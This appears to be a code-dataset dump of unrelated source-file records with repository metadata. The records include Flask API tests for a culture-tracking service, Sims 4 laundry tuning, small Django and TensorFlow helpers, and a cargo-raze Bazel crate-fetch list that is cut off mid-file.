5d406d0f937cfd4885b142e58bb183f9161016f5 | 48 | py | Python | kn-copy.py | kaushik2997/NewCodeManagement | eb2dc68388c7ee3ec23fed726efe690c1703ba3e | [
"MIT"
] | null | null | null | kn-copy.py | kaushik2997/NewCodeManagement | eb2dc68388c7ee3ec23fed726efe690c1703ba3e | [
"MIT"
] | null | null | null | kn-copy.py | kaushik2997/NewCodeManagement | eb2dc68388c7ee3ec23fed726efe690c1703ba3e | [
"MIT"
] | null | null | null | print("Project is created by KAushik and Imran") | 48 | 48 | 0.791667 | 8 | 48 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 48 | 1 | 48 | 48 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0.795918 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
5d6c4a19f406b2c6763e549fe1baede7b11b45a6 | 9,118 | py | Python | project/tests/test_lines.py | mycognosist/mycofile-api | d38efef7e9c256e046e9c5ff3ddf89b686e43377 | [
"MIT"
] | null | null | null | project/tests/test_lines.py | mycognosist/mycofile-api | d38efef7e9c256e046e9c5ff3ddf89b686e43377 | [
"MIT"
] | null | null | null | project/tests/test_lines.py | mycognosist/mycofile-api | d38efef7e9c256e046e9c5ff3ddf89b686e43377 | [
"MIT"
] | null | null | null | # project/tests/test_lines.py
import json
from project.tests.base import BaseTestCase
from project import db
from project.api.models import Line
from project.tests.utils import add_line
class TestLineService(BaseTestCase):
"""Tests for the Lines Service."""
def test_add_line(self):
"""Ensure a new line action can be added to the database."""
with self.client:
response = self.client.post(
'/api/v1/lines',
data=json.dumps(dict(
container='Petri',
substrate='LME',
culture_id='GLJP001',
user_id=1
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 201)
self.assertIn('Line object was added!', data['message'])
self.assertIn('success', data['status'])
def test_add_line_invalid_json(self):
"""Ensure error is thrown if the JSON object is empty."""
with self.client:
response = self.client.post(
'/api/v1/lines',
data=json.dumps(dict()),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 400)
self.assertIn('Invalid payload.', data['message'])
self.assertIn('fail', data['status'])
def test_add_line_invalid_culture_id_keys(self):
"""Ensure error is thrown if the JSON object does not have a culture_id key."""
with self.client:
response = self.client.post(
'/api/v1/lines',
data=json.dumps(dict(
container='Jar',
substrate='Wheat grain',
user_id=1
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 400)
self.assertIn('Invalid payload.', data['message'])
self.assertIn('fail', data['status'])
def test_add_line_invalid_user_id_keys(self):
"""Ensure error is thrown if the JSON object does not have a user_id key."""
with self.client:
response = self.client.post(
'/api/v1/lines',
data=json.dumps(dict(
container='Jar',
substrate='Wheat grain',
culture_id='PCMA002'
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 400)
self.assertIn('Invalid payload.', data['message'])
self.assertIn('fail', data['status'])
def test_single_line(self):
"""Ensure get single line object behaves correctly."""
l = Line(
container='Petri',
substrate='LME',
culture_id='GLJP001',
user_id=1
)
l.save()
with self.client:
response = self.client.get('/api/v1/users/1/lines/1')
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
self.assertIn('Petri', data['data']['container'])
self.assertIn('LME', data['data']['substrate'])
self.assertIn('GLJP001', data['data']['culture_id'])
self.assertEqual(data['data']['user_id'], 1)
self.assertIn('success', data['status'])
def test_single_line_no_id(self):
"""Ensure error is thrown if a valid id is not provided."""
with self.client:
response = self.client.get('/api/v1/users/1/lines/blah')
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
self.assertIn('Line object does not exist', data['message'])
self.assertIn('fail', data['status'])
def test_single_line_incorrect_id(self):
"""Ensure error is thrown if the id does not exist."""
with self.client:
response = self.client.get('/api/v1/users/1/lines/99')
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
self.assertIn('Line object does not exist', data['message'])
self.assertIn('fail', data['status'])
def test_all_lines(self):
"""Ensure get all lines behaves correctly."""
l1 = Line(
container='Petri',
substrate='LME',
culture_id='GLJP001',
user_id=1
)
l2 = Line(
container='Jar',
substrate='Wheat',
culture_id='HETK001',
user_id=1
)
l1.save()
l2.save()
with self.client:
response = self.client.get('/api/v1/users/1/lines')
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
self.assertEqual(len(data['data']['lines']), 2)
self.assertIn('Petri', data['data']['lines'][0]['container'])
self.assertIn('LME', data['data']['lines'][0]['substrate'])
self.assertIn('GLJP001', data['data']['lines'][0]['culture_id'])
self.assertEqual(data['data']['lines'][0]['id'], 1)
self.assertEqual(data['data']['lines'][0]['user_id'], 1)
self.assertIn('Jar', data['data']['lines'][1]['container'])
self.assertIn('Wheat', data['data']['lines'][1]['substrate'])
self.assertIn('HETK001', data['data']['lines'][1]['culture_id'])
self.assertEqual(data['data']['lines'][1]['id'], 2)
self.assertEqual(data['data']['lines'][1]['user_id'], 1)
self.assertIn('success', data['status'])
def test_delete_line_object(self):
"""Ensure line object is successfully deleted."""
l1 = Line(
container='Petri',
substrate='LME',
culture_id='GLJP001',
user_id=1
)
l1.save()
with self.client:
response = self.client.delete(
'/api/v1/users/1/lines/1',
data=json.dumps(dict()),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
self.assertIn('1 was deleted.', data['message'])
self.assertIn('success', data['status'])
def test_delete_line_object_incorrect_id(self):
"""Ensure error is thrown if the id does not exist."""
with self.client:
response = self.client.delete(
'/api/v1/users/1/lines/99',
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
self.assertIn('99 does not exist.', data['message'])
self.assertIn('fail', data['status'])
def test_update_line_object(self):
"""Ensure line object is successfully updated."""
l1 = Line(
container='Petri',
substrate='LME',
culture_id='GLJP001',
user_id=1,
active=True
)
l1.save()
with self.client:
response = self.client.put(
'/api/v1/users/1/lines/1',
data=json.dumps(dict(
active=False
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 201)
self.assertIn('1 was updated.', data['message'])
self.assertIn('success', data['status'])
def test_update_line_object_invalid_json(self):
"""Ensure error is thrown if the JSON object is empty."""
with self.client:
response = self.client.put(
'/api/v1/users/1/lines/1',
data=json.dumps(dict()),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 400)
self.assertIn('Invalid payload.', data['message'])
self.assertIn('fail', data['status'])
def test_update_line_object_incorrect_id(self):
"""Ensure error is thrown if the id does not exist."""
with self.client:
response = self.client.put(
'/api/v1/users/1/lines/999',
data=json.dumps(dict(
active=False
)),
content_type='application/json',
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
self.assertIn('999 does not exist.', data['message'])
self.assertIn('fail', data['status'])
| 39.301724 | 87 | 0.539811 | 999 | 9,118 | 4.82983 | 0.114114 | 0.082073 | 0.03772 | 0.059275 | 0.854922 | 0.840415 | 0.790259 | 0.76456 | 0.747772 | 0.72601 | 0 | 0.022679 | 0.322988 | 9,118 | 231 | 88 | 39.471861 | 0.75895 | 0.081048 | 0 | 0.651515 | 0 | 0 | 0.147689 | 0.025518 | 0 | 0 | 0 | 0 | 0.262626 | 1 | 0.065657 | false | 0 | 0.025253 | 0 | 0.09596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
537c6a9f831be0998345b0d3af74d2247add5606 | 7,564 | py | Python | S4/S4 Library/simulation/laundry/laundry_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | 1 | 2021-05-20T19:33:37.000Z | 2021-05-20T19:33:37.000Z | S4/S4 Library/simulation/laundry/laundry_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | S4/S4 Library/simulation/laundry/laundry_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | from event_testing.tests import TunableTestSet
from objects.components.state import TunableStateValueReference, TunableStateTypeReference
from sims.outfits.outfit_enums import OutfitCategory
from sims4.tuning.tunable import TunableReference, TunableEnumWithFilter, TunableTuple, TunablePercent, TunableSimMinute, TunableList, TunableSet, TunableEnumEntry, TunableMapping, TunablePackSafeReference
from tag import TunableTags, Tag
import services
import sims4.log
logger = sims4.log.Logger('Laundry', default_owner='mkartika')
class LaundryTuning:
GENERATE_CLOTHING_PILE = TunableTuple(description='\n The tunable to generate clothing pile on the lot. This will be called\n when we find laundry hero objects on the lot and there is no hamper\n available.\n ', loot_to_apply=TunableReference(description='\n Loot to apply for generating clothing pile.\n ', manager=services.get_instance_manager(sims4.resources.Types.ACTION), class_restrictions=('LootActions',), pack_safe=True), naked_outfit_category=TunableSet(description="\n Set of outfits categories which is considered naked.\n When Sim switches FROM these outfits, it won't generate the pile.\n When Sim switches TO these outfits, it won't apply laundry reward\n or punishment.\n ", tunable=TunableEnumEntry(tunable_type=OutfitCategory, default=OutfitCategory.EVERYDAY, invalid_enums=(OutfitCategory.CURRENT_OUTFIT,))), no_pile_outfit_category=TunableSet(description="\n Set of outfits categories which will never generate the pile.\n When Sim switches FROM or TO these outfits, it won't generate the\n pile.\n \n Laundry reward or punishment will still be applied to the Sim when \n switching FROM or TO these outfits.\n ", tunable=TunableEnumEntry(tunable_type=OutfitCategory, default=OutfitCategory.EVERYDAY, invalid_enums=(OutfitCategory.CURRENT_OUTFIT,))), no_pile_interaction_tag=TunableEnumWithFilter(description='\n If interaction does spin clothing change and has this tag, it will\n generate no clothing pile.\n ', tunable_type=Tag, default=Tag.INVALID, filter_prefixes=('interaction',)))
HAMPER_OBJECT_TAGS = TunableTags(description='\n Tags that considered hamper objects.\n ', filter_prefixes=('func',))
LAUNDRY_HERO_OBJECT_TAGS = TunableTags(description='\n Tags of laundry hero objects. Placing any of these objects on the lot\n will cause the service to generate clothing pile for each Sims on the\n household after spin clothing change.\n ', filter_prefixes=('func',))
NOT_DOING_LAUNDRY_PUNISHMENT = TunableTuple(description='\n If no Sim in the household unload completed laundry in specific\n amount of time, the negative loot will be applied to Sim household \n on spin clothing change to engage them doing laundry.\n ', timeout=TunableSimMinute(description="\n The amount of time in Sim minutes, since the last time they're \n finishing laundry, before applying the loot.\n ", default=2880, minimum=1), loot_to_apply=TunableReference(description='\n Loot defined here will be applied to the Sim in the household\n on spin clothing change if they are not doing laundry for \n a while.\n ', manager=services.get_instance_manager(sims4.resources.Types.ACTION), class_restrictions=('LootActions',), pack_safe=True))
PUT_AWAY_FINISHED_LAUNDRY = TunableTuple(description='\n The tunable to update laundry service on Put Away finished laundry\n interaction.\n ', interaction_tag=TunableEnumWithFilter(description='\n Tag that represent the put away finished laundry interaction which \n will update Laundry Service data.\n ', tunable_type=Tag, default=Tag.INVALID, filter_prefixes=('interaction',)), laundry_condition_states=TunableTuple(description='\n This is the state type of completed laundry object condition \n which will aggregate the data to the laundry service.\n ', condition_states=TunableList(description='\n A list of state types to be stored on laundry service.\n ', tunable=TunableStateTypeReference(pack_safe=True), unique_entries=True), excluded_states=TunableList(description='\n A list of state values of Condition States which will not \n be added to the laundry service.\n ', tunable=TunableStateValueReference(pack_safe=True), unique_entries=True)), laundry_condition_timeout=TunableSimMinute(description='\n The amount of time in Sim minutes that the individual laundry\n finished conditions will be kept in the laundry conditions \n aggregate data.\n ', default=1440, minimum=0), conditions_and_rewards_map=TunableMapping(description='\n Mapping of laundry conditions and loot rewards.\n ', key_type=TunableReference(manager=services.get_instance_manager(sims4.resources.Types.OBJECT_STATE), pack_safe=True), value_type=TunableReference(manager=services.get_instance_manager(sims4.resources.Types.ACTION), class_restrictions=('LootActions',), pack_safe=True)))
PUT_CLOTHING_PILE_ON_HAMPER = TunableTuple(description='\n The Tunable to directly put generated clothing pile in the hamper.\n ', chance=TunablePercent(description='\n The chance that a clothing pile will be put directly in the hamper. \n Tune the value in case putting clothing pile in hamper every \n spin-outfit-change feeling excessive.\n ', default=100), clothing_pile=TunableTuple(description="\n Clothing pile object that will be created and put into the hamper \n automatically. \n \n You won't see the object on the lot since it will go directly to \n the hamper. We create it because we need to transfer all of the \n commodities data and average the values into the hamper precisely.\n ", definition=TunablePackSafeReference(description='\n Reference to clothing pile object definition.\n ', manager=services.definition_manager()), initial_states=TunableList(description='\n A list of states to apply to the clothing pile as soon as it \n is created.\n ', tunable=TunableTuple(description='\n The state to apply and optional to decide if the state \n should be applied.\n ', state=TunableStateValueReference(pack_safe=True), tests=TunableTestSet()))), full_hamper_state=TunableStateValueReference(description='\n The state of full hamper which make the hamper is unavailable to \n add new clothing pile in it.\n ', pack_safe=True), loots_to_apply=TunableList(description='\n Loots to apply to the hamper when clothing pile is being put.\n ', tunable=TunableReference(manager=services.get_instance_manager(sims4.resources.Types.ACTION), class_restrictions=('LootActions',), pack_safe=True)), tests=TunableTestSet(description='\n The test to run on the Sim that must pass in order for putting\n clothing pile automatically to the hamper. These tests will only \n be run when we have available hamper on the lot.\n '))
| 444.941176 | 2,197 | 0.707694 | 970 | 7,564 | 5.426804 | 0.227835 | 0.059271 | 0.025646 | 0.024696 | 0.392287 | 0.333017 | 0.271847 | 0.227964 | 0.212386 | 0.212386 | 0 | 0.003565 | 0.221179 | 7,564 | 16 | 2,198 | 472.75 | 0.890002 | 0 | 0 | 0 | 0 | 1.133333 | 0.567425 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.066667 | 0.466667 | 0 | 0.933333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
53df6295fecc284a19e9859a4b445ac32b9f50d6 | 107 | py | Python | app/elastic-plugin/gui/views.py | starmanone/elastic-plugin | 04fa6764e10e6f58f934f78ce79cc43a4e59ddf9 | [
"MIT"
] | null | null | null | app/elastic-plugin/gui/views.py | starmanone/elastic-plugin | 04fa6764e10e6f58f934f78ce79cc43a4e59ddf9 | [
"MIT"
] | null | null | null | app/elastic-plugin/gui/views.py | starmanone/elastic-plugin | 04fa6764e10e6f58f934f78ce79cc43a4e59ddf9 | [
"MIT"
] | 1 | 2021-01-15T14:43:13.000Z | 2021-01-15T14:43:13.000Z | from django.shortcuts import render
def index(request):
return render(request,'gui/home-gui.html') | 26.75 | 46 | 0.738318 | 15 | 107 | 5.266667 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149533 | 107 | 4 | 46 | 26.75 | 0.868132 | 0 | 0 | 0 | 0 | 0 | 0.157407 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
9901f5b8a19a3f3fd677b3932e0aae10e8c475d1 | 194 | py | Python | mantraml/models/tensorflow/summary.py | cclauss/mantra | 19e2f72960da8314f11768d9acfe7836629b817c | [
"Apache-2.0"
] | null | null | null | mantraml/models/tensorflow/summary.py | cclauss/mantra | 19e2f72960da8314f11768d9acfe7836629b817c | [
"Apache-2.0"
] | null | null | null | mantraml/models/tensorflow/summary.py | cclauss/mantra | 19e2f72960da8314f11768d9acfe7836629b817c | [
"Apache-2.0"
] | null | null | null | import os
import tensorflow as tf
def FileWriter(mantra_model, **kwargs):
return tf.summary.FileWriter('%s/trials/%s/logs/' % (os.getcwd(), mantra_model.trial.trial_folder_name), **kwargs) | 32.333333 | 118 | 0.742268 | 28 | 194 | 5 | 0.678571 | 0.157143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103093 | 194 | 6 | 118 | 32.333333 | 0.804598 | 0 | 0 | 0 | 0 | 0 | 0.092308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
073066d78d57b310519aa253a79aef02141f7ed5 | 110 | py | Python | lang/py/cookbook/v2/source/cb2_1_23_sol_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/cookbook/v2/source/cb2_1_23_sol_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | lang/py/cookbook/v2/source/cb2_1_23_sol_3.py | ch1huizong/learning | 632267634a9fd84a5f5116de09ff1e2681a6cc85 | [
"MIT"
] | null | null | null | def encode_for_html(unicode_data, encoding='ascii'):
return unicode_data.encode(encoding, 'html_replace')
| 36.666667 | 56 | 0.790909 | 15 | 110 | 5.466667 | 0.666667 | 0.268293 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 110 | 2 | 57 | 55 | 0.82 | 0 | 0 | 0 | 0 | 0 | 0.154545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
073379ac5fbd211718cc1728b34c3d765a465356 | 18,112 | bzl | Python | bazel/complicated_cargo_library_remote/cargo/crates.bzl | acmcarther/cargo-raze-examples | a9d9b8f589ca93e3be235d98cada6354da796ecf | [
"Apache-2.0"
] | 4 | 2017-09-13T21:49:24.000Z | 2020-06-20T17:38:50.000Z | bazel/complicated_cargo_library_remote/cargo/crates.bzl | acmcarther/cargo-raze-examples | a9d9b8f589ca93e3be235d98cada6354da796ecf | [
"Apache-2.0"
] | 6 | 2017-09-13T00:53:42.000Z | 2019-05-01T01:00:52.000Z | bazel/complicated_cargo_library_remote/cargo/crates.bzl | acmcarther/cargo-raze-examples | a9d9b8f589ca93e3be235d98cada6354da796ecf | [
"Apache-2.0"
] | 1 | 2018-03-15T03:12:06.000Z | 2018-03-15T03:12:06.000Z | """
cargo-raze crate workspace functions
DO NOT EDIT! Replaced on runs of cargo-raze
"""
def complicated_fetch_remote_crates():
native.new_http_archive(
name = "complicated__aho_corasick__0_6_4",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/aho-corasick/aho-corasick-0.6.4.crate",
type = "tar.gz",
strip_prefix = "aho-corasick-0.6.4",
build_file = "//complicated_cargo_library_remote/cargo/remote:aho-corasick-0.6.4.BUILD"
)
native.new_http_archive(
name = "complicated__arrayvec__0_3_25",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/arrayvec/arrayvec-0.3.25.crate",
type = "tar.gz",
strip_prefix = "arrayvec-0.3.25",
build_file = "//complicated_cargo_library_remote/cargo/remote:arrayvec-0.3.25.BUILD"
)
native.new_http_archive(
name = "complicated__arrayvec__0_4_7",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/arrayvec/arrayvec-0.4.7.crate",
type = "tar.gz",
strip_prefix = "arrayvec-0.4.7",
build_file = "//complicated_cargo_library_remote/cargo/remote:arrayvec-0.4.7.BUILD"
)
native.new_http_archive(
name = "complicated__atom__0_3_4",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/atom/atom-0.3.4.crate",
type = "tar.gz",
strip_prefix = "atom-0.3.4",
build_file = "//complicated_cargo_library_remote/cargo/remote:atom-0.3.4.BUILD"
)
native.new_http_archive(
name = "complicated__bitflags__1_0_1",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/bitflags/bitflags-1.0.1.crate",
type = "tar.gz",
strip_prefix = "bitflags-1.0.1",
build_file = "//complicated_cargo_library_remote/cargo/remote:bitflags-1.0.1.BUILD"
)
native.new_http_archive(
name = "complicated__cfg_if__0_1_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/cfg-if/cfg-if-0.1.2.crate",
type = "tar.gz",
strip_prefix = "cfg-if-0.1.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:cfg-if-0.1.2.BUILD"
)
native.new_http_archive(
name = "complicated__crossbeam__0_3_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/crossbeam/crossbeam-0.3.2.crate",
type = "tar.gz",
strip_prefix = "crossbeam-0.3.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:crossbeam-0.3.2.BUILD"
)
native.new_http_archive(
name = "complicated__crossbeam_deque__0_2_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/crossbeam-deque/crossbeam-deque-0.2.0.crate",
type = "tar.gz",
strip_prefix = "crossbeam-deque-0.2.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:crossbeam-deque-0.2.0.BUILD"
)
native.new_http_archive(
name = "complicated__crossbeam_epoch__0_3_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/crossbeam-epoch/crossbeam-epoch-0.3.0.crate",
type = "tar.gz",
strip_prefix = "crossbeam-epoch-0.3.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:crossbeam-epoch-0.3.0.BUILD"
)
native.new_http_archive(
name = "complicated__crossbeam_utils__0_2_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/crossbeam-utils/crossbeam-utils-0.2.2.crate",
type = "tar.gz",
strip_prefix = "crossbeam-utils-0.2.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:crossbeam-utils-0.2.2.BUILD"
)
native.new_http_archive(
name = "complicated__derivative__1_0_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/derivative/derivative-1.0.0.crate",
type = "tar.gz",
strip_prefix = "derivative-1.0.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:derivative-1.0.0.BUILD"
)
native.new_http_archive(
name = "complicated__either__1_4_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/either/either-1.4.0.crate",
type = "tar.gz",
strip_prefix = "either-1.4.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:either-1.4.0.BUILD"
)
native.new_http_archive(
name = "complicated__fnv__1_0_6",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/fnv/fnv-1.0.6.crate",
type = "tar.gz",
strip_prefix = "fnv-1.0.6",
build_file = "//complicated_cargo_library_remote/cargo/remote:fnv-1.0.6.BUILD"
)
native.new_http_archive(
name = "complicated__fuchsia_zircon__0_3_3",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/fuchsia-zircon/fuchsia-zircon-0.3.3.crate",
type = "tar.gz",
strip_prefix = "fuchsia-zircon-0.3.3",
build_file = "//complicated_cargo_library_remote/cargo/remote:fuchsia-zircon-0.3.3.BUILD"
)
native.new_http_archive(
name = "complicated__fuchsia_zircon_sys__0_3_3",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/fuchsia-zircon-sys/fuchsia-zircon-sys-0.3.3.crate",
type = "tar.gz",
strip_prefix = "fuchsia-zircon-sys-0.3.3",
build_file = "//complicated_cargo_library_remote/cargo/remote:fuchsia-zircon-sys-0.3.3.BUILD"
)
native.new_http_archive(
name = "complicated__hibitset__0_3_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/hibitset/hibitset-0.3.2.crate",
type = "tar.gz",
strip_prefix = "hibitset-0.3.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:hibitset-0.3.2.BUILD"
)
native.new_http_archive(
name = "complicated__itertools__0_5_10",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/itertools/itertools-0.5.10.crate",
type = "tar.gz",
strip_prefix = "itertools-0.5.10",
build_file = "//complicated_cargo_library_remote/cargo/remote:itertools-0.5.10.BUILD"
)
native.new_http_archive(
name = "complicated__lazy_static__0_2_11",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/lazy_static/lazy_static-0.2.11.crate",
type = "tar.gz",
strip_prefix = "lazy_static-0.2.11",
build_file = "//complicated_cargo_library_remote/cargo/remote:lazy_static-0.2.11.BUILD"
)
native.new_http_archive(
name = "complicated__lazy_static__1_0_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/lazy_static/lazy_static-1.0.0.crate",
type = "tar.gz",
strip_prefix = "lazy_static-1.0.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:lazy_static-1.0.0.BUILD"
)
native.new_http_archive(
name = "complicated__libc__0_2_36",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/libc/libc-0.2.36.crate",
type = "tar.gz",
strip_prefix = "libc-0.2.36",
build_file = "//complicated_cargo_library_remote/cargo/remote:libc-0.2.36.BUILD"
)
native.new_http_archive(
name = "complicated__memchr__2_0_1",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/memchr/memchr-2.0.1.crate",
type = "tar.gz",
strip_prefix = "memchr-2.0.1",
build_file = "//complicated_cargo_library_remote/cargo/remote:memchr-2.0.1.BUILD"
)
native.new_http_archive(
name = "complicated__memoffset__0_2_1",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/memoffset/memoffset-0.2.1.crate",
type = "tar.gz",
strip_prefix = "memoffset-0.2.1",
build_file = "//complicated_cargo_library_remote/cargo/remote:memoffset-0.2.1.BUILD"
)
native.new_http_archive(
name = "complicated__mopa__0_2_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/mopa/mopa-0.2.2.crate",
type = "tar.gz",
strip_prefix = "mopa-0.2.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:mopa-0.2.2.BUILD"
)
native.new_http_archive(
name = "complicated__nodrop__0_1_12",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/nodrop/nodrop-0.1.12.crate",
type = "tar.gz",
strip_prefix = "nodrop-0.1.12",
build_file = "//complicated_cargo_library_remote/cargo/remote:nodrop-0.1.12.BUILD"
)
native.new_http_archive(
name = "complicated__num_cpus__1_8_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/num_cpus/num_cpus-1.8.0.crate",
type = "tar.gz",
strip_prefix = "num_cpus-1.8.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:num_cpus-1.8.0.BUILD"
)
native.new_http_archive(
name = "complicated__odds__0_2_26",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/odds/odds-0.2.26.crate",
type = "tar.gz",
strip_prefix = "odds-0.2.26",
build_file = "//complicated_cargo_library_remote/cargo/remote:odds-0.2.26.BUILD"
)
native.new_http_archive(
name = "complicated__pulse__0_5_3",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/pulse/pulse-0.5.3.crate",
type = "tar.gz",
strip_prefix = "pulse-0.5.3",
build_file = "//complicated_cargo_library_remote/cargo/remote:pulse-0.5.3.BUILD"
)
native.new_http_archive(
name = "complicated__quote__0_3_15",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/quote/quote-0.3.15.crate",
type = "tar.gz",
strip_prefix = "quote-0.3.15",
build_file = "//complicated_cargo_library_remote/cargo/remote:quote-0.3.15.BUILD"
)
native.new_http_archive(
name = "complicated__rand__0_4_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/rand/rand-0.4.2.crate",
type = "tar.gz",
strip_prefix = "rand-0.4.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:rand-0.4.2.BUILD"
)
native.new_http_archive(
name = "complicated__rayon__0_8_2",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/rayon/rayon-0.8.2.crate",
type = "tar.gz",
strip_prefix = "rayon-0.8.2",
build_file = "//complicated_cargo_library_remote/cargo/remote:rayon-0.8.2.BUILD"
)
native.new_http_archive(
name = "complicated__rayon_core__1_4_0",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/rayon-core/rayon-core-1.4.0.crate",
type = "tar.gz",
strip_prefix = "rayon-core-1.4.0",
build_file = "//complicated_cargo_library_remote/cargo/remote:rayon-core-1.4.0.BUILD"
)
native.new_http_archive(
name = "complicated__redox_syscall__0_1_37",
url = "https://crates-io.s3-us-west-1.amazonaws.com/crates/redox_syscall/redox_syscall-0.1.37.crate",
type = "tar.gz",
strip_prefix = "redox_syscall-0.1.37",
build_file = "//complicated_cargo_library_remote/cargo/remote:redox_syscall-0.1.37.BUILD"
)
native.new_http_archive(
